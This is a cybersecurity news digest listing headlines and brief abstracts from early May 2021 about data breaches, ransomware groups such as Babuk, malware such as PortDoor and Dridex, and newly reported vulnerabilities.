345,000 Legal and Operational Documents from Filipino Solicitor-General’s Office Accessed by Unknown Third Party Full Text

Abstract The files were publicly available since at least February, when TurgenSec said it first discovered the breach and emailed the solicitor-general and the Philippines government about the files.

ZDNet

May 03, 2021 – Malware

New Chinese Malware Targeted Russia’s Largest Nuclear Submarine Designer Full Text

Abstract A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed " PortDoor ," according to Cybereason's Nocturnus threat intelligence team. "Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers  said  in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting fo

The Hacker News

May 3, 2021 – General

Keeping up: How the threat landscape drove demand for and development of new capabilities Full Text

Abstract How did a more threatening landscape shape strategies? And what changes will stick? In this SC Awards Winners Circle roundtable discussion, SC Media speaks to cybersecurity leaders, and award winners, about the year that was and its impact on the years to come.

SCMagazine

May 3, 2021 – Breach

COVID-19 Contact Tracing Breach Impacts Private Information of 72,000 People in Pennsylvania Full Text

Abstract Employees of a vendor conducting COVID-19 contact tracing in Pennsylvania may have compromised the information of at least 72,000 people, including their exposure status and their sexual orientation.

6ABC

May 3, 2021 – General

Where do we go from here? The cyber industry’s struggle for speed and superiority Full Text

Abstract The cybersecurity industry faces twin calamities: unprecedented speed of modern cyberattacks and software as a single point of failure. SC Media examines where the cyber market must go from here.

SCMagazine

May 3, 2021 – Criminals

How Cybercriminals Abuse OpenBullet for Credential Stuffing Full Text

Abstract As the business of acquiring unique credentials continues to become more lucrative, cybercriminals are growing their attack tools and techniques by abusing legitimate software for nefarious purposes.

Trend Micro

May 3, 2021 – General

Shedding light on the threat posed by shadow admins Full Text

Abstract If threat actors take control of one of these accounts, they can extend their attack in many ways, perhaps seeking opportunities for lateral movement or privilege escalation whilst staying incognito.

Help Net Security

May 3, 2021 – Vulnerabilities

Researchers develop program that helps assess encryption systems’ vulnerabilities Full Text

Abstract A doctoral student at HSE University has proposed a new method to assess vulnerabilities in encryption systems, which is based on a brute-force search of possible options of symbol deciphering.

Help Net Security

May 2, 2021 – Malware

WeSteal, a shameless commodity cryptocurrency stealer available for sale Full Text

Abstract The bold author of a new cryptocurrency stealer, dubbed WeSteal, is promising its customers a leading way to make money in 2021. A new cryptocurrency stealer dubbed WeSteal is available on the cybercrime underground, unlike other commodity cryptocurrency...

Security Affairs

May 02, 2021 – Privacy

How to stop Windows 10 Defender from uploading files to Microsoft Full Text

Abstract Like other antivirus programs, Microsoft Defender will upload suspicious files to Microsoft to determine if they are malicious. However, some consider this a privacy risk and would rather have their files stay on their computer than being uploaded to a third party. 

BleepingComputer

May 2, 2021 – General

Security Affairs newsletter Round 312 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. 10,000+ unpatched ABUS Secvest home alarms can be deactivated remotelyHackers are targeting Soliton...

Security Affairs

May 2, 2021 – Hacker

Hacking a Tesla Model X with a DJI Mavic 2 drone equipped with a WIFI dongle Full Text

Abstract A security duo has demonstrated how to hack a Tesla Model X’s and open the doors using a DJI Mavic 2 drone equipped with a WIFI dongle. The scenario is disconcerting, hackers could use a drone to fly on your Tesla Model X and open the doors, a couple...

Security Affairs

May 2, 2021 – Ransomware

Cloud hosting provider Swiss Cloud suffered a ransomware attack Full Text

Abstract Swiss cloud hosting provider Swiss Cloud has suffered a ransomware attack that seriously impacted its server infrastructure. On April 27 the Swiss cloud hosting provider was hit by a ransomware attack that brought down the company’s server infrastructure. The...

Security Affairs

May 1, 2021 – Malware

The Return of Dridex Banking Trojan Full Text

Abstract Scammers have been found sending QuickBooks invoices to infect victims’ devices with Dridex banking malware. About 14% of the malicious emails reached U.S. clients and 11% to South Korea. 

Cyware Alerts - Hacker News

May 01, 2021 – Solution

Office 365 security baseline adds macro signing, JScript protection Full Text

Abstract Microsoft has updated the security baseline for Microsoft 365 Apps for enterprise (formerly Office 365 Professional Plus) to include protection from JScript code execution attacks and unsigned macros.

BleepingComputer

May 1, 2021 – Ransomware

Babuk - A Growing Ransomware Threat Full Text

Abstract The rapidly emerging Babuk ransomware is becoming a serious threat as it has compromised the networks of sports, communication sectors, and government entities - all within a month.

Cyware Alerts - Hacker News

May 01, 2021 – Ransomware

Python also impacted by critical IP address validation vulnerability Full Text

Abstract Python 3.3 standard library 'ipaddress' suffers from a critical IP address vulnerability (CVE-2021-29921) identical to the flaw that was reported in the "netmask" library earlier this year.

BleepingComputer

May 1, 2021 – Ransomware

Mount Locker Ransomware Learns New Tricks to Evade Detection Full Text

Abstract Researchers have found Mount Locker ransomware using sophisticated scripting and anti-prevention features in recent campaigns, and the change in tactics may be accompanied by the AstroLocker rebranding.

Cyware Alerts - Hacker News

May 1, 2021 – Vulnerabilities

Zero-Day Threats Keeping Organizations Super Busy Full Text

Abstract Zero-day attacks are one of the most challenging threats as they are very difficult to predict. Attackers have exploited zero-day flaws in applications and devices by Microsoft, Google, Apple, and others.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

AgeLocker ransomware operation targets QNAP NAS devices Full Text

Abstract Taiwanese vendor QNAP is warning its customers of AgeLocker ransomware attacks on their NAS devices. Crooks behind the AgeLocker ransomware operation are targeting QNAP NAS devices, the Taiwanese vendor warns. The vendor doesn't provide technical...

Security Affairs

May 1, 2021 – Hacker

Lazarus Group Looks to Cryptocurrency Theft to Diversify its Attack Tactics Full Text

Abstract While the North Korean threat actor had targeted e-commerce shops in 2019 and 2020 to steal payment card information, the attackers aimed to steal cryptocurrency, as well.

Cyware Alerts - Hacker News

May 1, 2021 – Vulnerabilities

Flaws in the BIND software expose DNS servers to attacks Full Text

Abstract The Internet Systems Consortium (ISC) released updates for the BIND DNS software to patch several denial-of-service (DoS) and potential RCE flaws. The Internet Systems Consortium (ISC) has released security updates for the BIND DNS software to address...

Security Affairs

May 1, 2021 – Hacker

SolarMarket RAT Uses Google SEO Tactics to Lure Victims Full Text

Abstract Attackers are using Google search redirection and drive-by-download tactics to infect targeted users with SolarMarker RAT.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

Babuk crew announced it will stop ransomware attacks Full Text

Abstract Babuk ransomware operators shut down their affiliate program and announced to stop using ransomware, the group plans to move on data theft. Recently the Babuk ransomware operators made the headlines for the ransomware attack against the DC Police...

Security Affairs

May 1, 2021 – Vulnerabilities

Several Threats Still Looming over Microsoft Exchange Full Text

Abstract Security researchers from Sophos revealed that attackers are trying to exploit the ProxyLogon vulnerabilities in Microsoft Exchange to install Monero cryptominer on the targeted servers.

Cyware Alerts - Hacker News

May 1, 2021 – Botnet

Gafgyt Learns from Mirai Botnet Full Text

Abstract The reuse of the Mirai source code has enhanced the capability of Gafgyt to carry out DDoS attacks in various ways.

Cyware Alerts - Hacker News

May 1, 2021 – Ransomware

In The Ransomware Battle, Cybercriminals Have The Upper Hand Full Text

Abstract The NBA's Houston Rockets were hit by a ransomware attack earlier this month. Now it's the Washington, D.C., police department. The common thread is an unknown ransomware group called Babuk.

NPR

More

Table of contents